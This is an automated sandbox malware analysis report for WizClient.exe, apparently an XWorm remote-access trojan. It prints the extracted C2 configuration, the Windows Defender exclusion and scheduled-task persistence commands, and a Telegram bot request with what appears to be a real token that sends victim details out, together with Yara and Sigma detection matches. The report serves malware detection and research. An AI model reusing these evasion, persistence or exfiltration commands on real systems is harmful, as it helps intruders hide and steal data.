
Windows Analysis Report
WizClient.exe

Overview

General Information

Sample name: WizClient.exe
Analysis ID: 1636114
MD5: 4df0e2c3c8b75a58f9cab6e4a6125bc9
SHA1: c53c2d60f1fdf2eb0fafaccf6ca93d566b5c9d98
SHA256: c8a29e32b2977f1e5e757178313c319e04d031a2165ed2ddad6ed8e2a1ebd61f
Tags: exe, user-BastianHein

Detection

XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • WizClient.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\WizClient.exe" MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
    • powershell.exe (PID: 6920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 9112 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 9120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • WizClient.exe (PID: 5156 cmdline: C:\Users\user\AppData\Local\WizClient.exe MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
  • WizClient.exe (PID: 8300 cmdline: "C:\Users\user\AppData\Local\WizClient.exe" MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
  • WizClient.exe (PID: 1364 cmdline: "C:\Users\user\AppData\Local\WizClient.exe" MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
  • WizClient.exe (PID: 3728 cmdline: C:\Users\user\AppData\Local\WizClient.exe MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
  • cleanup
{"C2 url": ["amazon-astrology.gl.at.ply.gg"], "Port": 54918, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Yara matches on the submitted sample

Source | Rule | Description | Author
WizClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
WizClient.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xc6bf:$str01: $VB$Local_Port
  • 0xc6e3:$str02: $VB$Local_Host
  • 0xab2d:$str03: get_Jpeg
  • 0xb0f1:$str04: get_ServicePack
  • 0xdc15:$str05: Select * from AntivirusProduct
  • 0xe337:$str06: PCRestart
  • 0xe34b:$str07: shutdown.exe /f /r /t 0
  • 0xe3eb:$str08: StopReport
  • 0xe3c1:$str09: StopDDos
  • 0xe431:$str10: sendPlugin
  • 0xe5a1:$str12: -ExecutionPolicy Bypass -File "
  • 0xee5b:$str13: Content-length: 5235
WizClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10247:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x102e4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x103f9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xed76:$cnc4: POST / HTTP/1.1

Yara matches on dropped files

Source | Rule | Description | Author
C:\Users\user\AppData\Local\WizClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\WizClient.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xc6bf:$str01: $VB$Local_Port
  • 0xc6e3:$str02: $VB$Local_Host
  • 0xab2d:$str03: get_Jpeg
  • 0xb0f1:$str04: get_ServicePack
  • 0xdc15:$str05: Select * from AntivirusProduct
  • 0xe337:$str06: PCRestart
  • 0xe34b:$str07: shutdown.exe /f /r /t 0
  • 0xe3eb:$str08: StopReport
  • 0xe3c1:$str09: StopDDos
  • 0xe431:$str10: sendPlugin
  • 0xe5a1:$str12: -ExecutionPolicy Bypass -File "
  • 0xee5b:$str13: Content-length: 5235
C:\Users\user\AppData\Local\WizClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10247:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x102e4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x103f9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xed76:$cnc4: POST / HTTP/1.1

Yara matches in process memory

Source | Rule | Description | Author
00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10047:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x100e4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x101f9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xeb76:$cnc4: POST / HTTP/1.1
Process Memory Space: WizClient.exe PID: 7012 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Yara matches on unpacked PE files

Source | Rule | Description | Author
3.0.WizClient.exe.230000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
3.0.WizClient.exe.230000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0xc6bf:$str01: $VB$Local_Port
  • 0xc6e3:$str02: $VB$Local_Host
  • 0xab2d:$str03: get_Jpeg
  • 0xb0f1:$str04: get_ServicePack
  • 0xdc15:$str05: Select * from AntivirusProduct
  • 0xe337:$str06: PCRestart
  • 0xe34b:$str07: shutdown.exe /f /r /t 0
  • 0xe3eb:$str08: StopReport
  • 0xe3c1:$str09: StopDDos
  • 0xe431:$str10: sendPlugin
  • 0xe5a1:$str12: -ExecutionPolicy Bypass -File "
  • 0xee5b:$str13: Content-length: 5235
3.0.WizClient.exe.230000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10247:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x102e4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x103f9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xed76:$cnc4: POST / HTTP/1.1

System Summary

Sigma rule matches

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', ProcessId: 6920, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', ProcessId: 6920, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\WizClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WizClient.exe, ProcessId: 7012, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WizClient
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', ProcessId: 6920, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\WizClient.exe, ProcessId: 7012, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizClient.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe", ProcessId: 9112, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', ProcessId: 6920, ProcessName: powershell.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-12T12:21:02.903256+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49728 | 147.185.221.26 | 54918 | TCP
2025-03-12T12:20:01.105440+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.5 | 49714 | 149.154.167.220 | 443 | TCP


AV Detection

Source: WizClient.exe | Avira: detected
Source: amazon-astrology.gl.at.ply.gg | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\WizClient.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: WizClient.exe | Malware Configuration Extractor: Xworm {"C2 url": ["amazon-astrology.gl.at.ply.gg"], "Port": 54918, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Local\WizClient.exe | ReversingLabs: Detection: 71%
Source: WizClient.exe | Virustotal: Detection: 69%
Source: WizClient.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: WizClient.exe | String decryptor: amazon-astrology.gl.at.ply.gg
Source: WizClient.exe | String decryptor: 54918
Source: WizClient.exe | String decryptor: <123456789>
Source: WizClient.exe | String decryptor: <Xwormmm>
Source: WizClient.exe | String decryptor: USB.exe
Source: WizClient.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 91.134.10.168:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: WizClient.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49728 -> 147.185.221.26:54918
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49714 -> 149.154.167.220:443
Source: Malware configuration extractor | URLs: amazon-astrology.gl.at.ply.gg
Source: global traffic | TCP traffic: 147.185.221.26 ports 54918,1,4,5,8,9
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.5:49717 -> 147.185.221.26:54918
Source: global traffic | HTTP traffic detected: GET /bot7389617975:AAFNBkW6gfsAxHeXuCSCpKK2LqIKysVo-aw/sendMessage?chat_id=6968388729&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1E4B5E3450B776F282A4%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1 (Host: api.telegram.org, Connection: Keep-Alive)
Source: global traffic | HTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1 (Host: i.ibb.co, Connection: Keep-Alive), 11 identical requests observed
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 147.185.221.26
Source: Joe Sandbox View | IP Address: 108.181.22.211
Source: Joe Sandbox View | IP Address: 91.134.10.168
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: amazon-astrology.gl.at.ply.gg
Source: global traffic | DNS traffic detected: DNS query: i.ibb.co
Source: powershell.exe, 00000008.00000002.1543347899.0000016119F05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://e6.i.lencr.org/0
Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://e6.o.lencr.org0
Source: WizClient.exe, 00000003.00000002.2561891365.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2561891365.00000000024FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i.ibb.co
Source: powershell.exe, 00000005.00000002.1379923372.000001F96D949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1528597758.0000016111768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1362115925.000001F95DAF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1430483427.0000016101919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: WizClient.exe, 00000003.00000002.2561891365.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1362115925.000001F95D8D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1430483427.00000161016F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1581919442.0000020C80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1362115925.000001F95DAF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1430483427.0000016101919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2589619208.000000001B329000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2589619208.000000001B329000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: powershell.exe, 00000005.00000002.1362115925.000001F95D8D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1430483427.00000161016F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1581919442.0000020C80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: WizClient.exe, WizClient.exe.3.dr | String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: WizClient.exe, 00000003.00000002.2561891365.000000000249C000.00000004.00000800.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2561891365.00000000024CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://i.ibb.co
Source: WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://i.ibb.co(
Source: WizClient.exe, WizClient.exe.3.dr | String found in binary or memory: https://i.ibb.co/Dwrj41N/Image.png
Source: powershell.exe, 00000005.00000002.1379923372.000001F96D949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1528597758.0000016111768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 91.134.10.168:443 -> 192.168.2.5:49725 version: TLS 1.2

            Operating System Destruction

Source: C:\Users\user\Desktop\WizClient.exe | Process information set: 01 00 00 00

            System Summary

Source: WizClient.exe, type: SAMPLE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
Source: WizClient.exe, type: SAMPLE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
Source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: 00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings, Author: Sekoia.io
Source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPED | Matched rule: Detects AsyncRAT, Author: ditekSHen
Source: C:\Users\user\Desktop\WizClient.exe | Code function: 3_2_00007FF7C7C677F1
